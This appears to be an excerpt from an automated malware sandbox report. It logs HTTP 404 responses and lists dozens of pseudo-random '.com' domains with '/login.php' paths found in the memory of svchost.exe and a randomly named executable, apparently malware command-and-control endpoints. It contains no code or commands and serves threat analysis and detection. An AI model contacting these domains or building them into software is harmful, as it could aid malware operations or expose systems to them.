Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Content-Type: text/html; Server: Microsoft-IIS/7.5; X-Powered-By: ASP.NET; Date: Mon, 11 Nov 2024 17:50:43 GMT; Content-Length: 1245
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: openresty/1.21.4.3; Date: Mon, 11 Nov 2024 17:50:52 GMT; Content-Type: text/html; Content-Length: 561; Connection: keep-alive
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: openresty/1.21.4.3; Date: Mon, 11 Nov 2024 17:50:53 GMT; Content-Type: text/html; Content-Length: 561; Connection: keep-alive
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Mon, 11 Nov 2024 17:50:58 GMT; Content-Type: text/html; Content-Length: 138; Connection: keep-alive; ETag: "663ee226-8a"
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Mon, 11 Nov 2024 17:50:58 GMT; Content-Type: text/html; Content-Length: 138; Connection: keep-alive; ETag: "663ee226-8a"
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.14.0 (Ubuntu); Date: Mon, 11 Nov 2024 17:51:02 GMT; Content-Type: text/html; Content-Length: 580; Connection: keep-alive
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.14.0 (Ubuntu); Date: Mon, 11 Nov 2024 17:51:03 GMT; Content-Type: text/html; Content-Length: 580; Connection: keep-alive
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Mon, 11 Nov 2024 17:51:05 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Mon, 11 Nov 2024 17:51:07 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Mon, 11 Nov 2024 17:51:09 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 17:51:09 GMT Content-Type: text/html Content-Length: 548 Connection: keep-alive
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Mon, 11 Nov 2024 17:51:10 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 17:51:11 GMT Content-Type: text/html Content-Length: 548 Connection: keep-alive
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Mon, 11 Nov 2024 17:51:12 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 17:51:14 GMT Content-Type: text/html Content-Length: 548 Connection: keep-alive
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 17:51:17 GMT Content-Type: text/html Content-Length: 548 Connection: keep-alive
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Mon, 11 Nov 2024 17:51:22 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 17:51:22 GMT Content-Type: text/html Content-Length: 548 Connection: keep-alive
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 17:51:25 GMT Content-Type: text/html Content-Length: 548 Connection: keep-alive
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 17:51:34 GMT Content-Type: text/html Content-Length: 548 Connection: keep-alive
Source: svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahypoz.com/login.php
Source: svchost.exe, 00000002.00000003.2875776226.00000000040F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2855333328.00000000040F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2854823714.00000000040EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyqas.com/
Source: svchost.exe, 00000002.00000003.2875776226.00000000040F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2855333328.00000000040F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2854823714.00000000040EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyqas.com/H
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329364841.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2327922219.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330522610.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547959760.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyraw.com/login.php
Source: svchost.exe, 00000002.00000002.3428370692.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3287645590.00000000092EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2905696441.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3426788667.0000000009235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyvab.com/login.php
Source: svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyvuh.com/H
Source: svchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649350353.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347333934.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347614295.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyvuh.com/login.php
Source: svchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2360502034.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760150538.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358968663.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358089375.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363422290.00000000092C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359102012.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363692365.00000000092C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2362592176.00000000092C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyziw.com/login.php
Source: svchost.exe, 00000002.00000003.2509683984.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513678339.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2542956129.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513019694.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2506997946.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499635923.0000000000855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galydoz.com/login.php
Source: svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galydyw.com/login.php
Source: svchost.exe, 00000002.00000003.2347539212.0000000003309000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyfis.com/
Source: svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649350353.0000000000853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyfis.com/login.php
Source: svchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2341534976.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2341852646.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyheh.com/login.php
Source: svchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388806823.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2185076169.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2387081098.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2622033644.0000000008E90000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000003.2572564754.0000000000FB2000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D8F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2613849314.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000003.2558068199.0000000008D9F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2613849314.0000000000F68000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2608350004.00000000007DF000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2614917822.00000000014D8000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2614917822.000000000154E000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2745540362.00000000093CD000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2640207678.0000000001363000.00000004.00000020.00020000.00000000.sdmp, 
PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2756051050.000000000914B000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2856769526.0000000008FC3000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2676238100.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000018.00000002.2676884944.00000000009FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galykes.com/login.php
Source: svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347333934.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346961253.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347614295.0000000000853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galynab.com/login.php
Source: svchost.exe, 00000002.00000002.3428370692.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2379463124.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380581815.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3287645590.00000000092EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2908725007.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2905696441.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galynus.com/login.php
Source: svchost.exe, 00000002.00000003.2729337658.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2360502034.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2361263640.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358968663.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358089375.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363422290.00000000092C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359102012.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363692365.00000000092C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2362592176.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2735954545.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galypob.com/login.php
Source: svchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2414263063.00000000033CA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2197741050.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388405607.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178331950.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2185076169.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2622033644.0000000008E6B000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2604863482.00000000010A3000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2622033644.0000000008E90000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2613849314.0000000000EE8000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D47000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D8F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000003.2558068199.0000000008D9F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2613849314.0000000000F68000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2671362092.00000000086C1000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 
00000009.00000002.2671362092.0000000008682000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2745540362.00000000093A5000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2745540362.0000000009360000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2745540362.00000000093CD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://galyqaz.com/login.php
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337365737.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337520424.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337073481.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2575537635.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336470104.0000000003356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyquw.com/login.php
Source: svchost.exe, 00000002.00000002.3428370692.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388023341.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3287645590.00000000092EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3408110880.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398171627.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2387081098.00000000092B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyvaw.com/login.php
Source: svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667617957.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyvuz.com/login.php
Source: svchost.exe, 00000002.00000003.2637865779.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329364841.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330574542.0000000003356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2327922219.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330522610.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635608953.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547959760.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyzeb.com/login.php
Source: svchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2729337658.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2360502034.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358968663.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358089375.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363422290.00000000092C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359102012.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363692365.00000000092C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2362592176.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2735954545.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyfuz.com/login.php
Source: svchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyfuz.com/login.phpE
Source: svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyhab.com/login.php
Source: svchost.exe, 00000002.00000002.3418118048.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2381728153.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3408110880.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2387081098.00000000092B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyhus.com/login.php
Source: svchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667617957.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649350353.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347333934.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347614295.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganykuw.com/login.php
Source: svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganynos.com/login.php
Source: svchost.exe, 00000002.00000003.2513678339.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2542956129.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513019694.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499635923.0000000000855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganynyb.com/login.php
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2571444797.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganypeb.com/login.php
Source: svchost.exe, 00000002.00000002.3428370692.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2379463124.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380581815.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3287645590.00000000092EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2908725007.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2905696441.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3421967691.00000000040FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyqib.com/login.php
Source: svchost.exe, 00000002.00000003.2513678339.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2542956129.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513019694.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499635923.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2496966130.0000000000851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyqow.com/login.php
Source: svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346961253.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyqyh.com/login.php
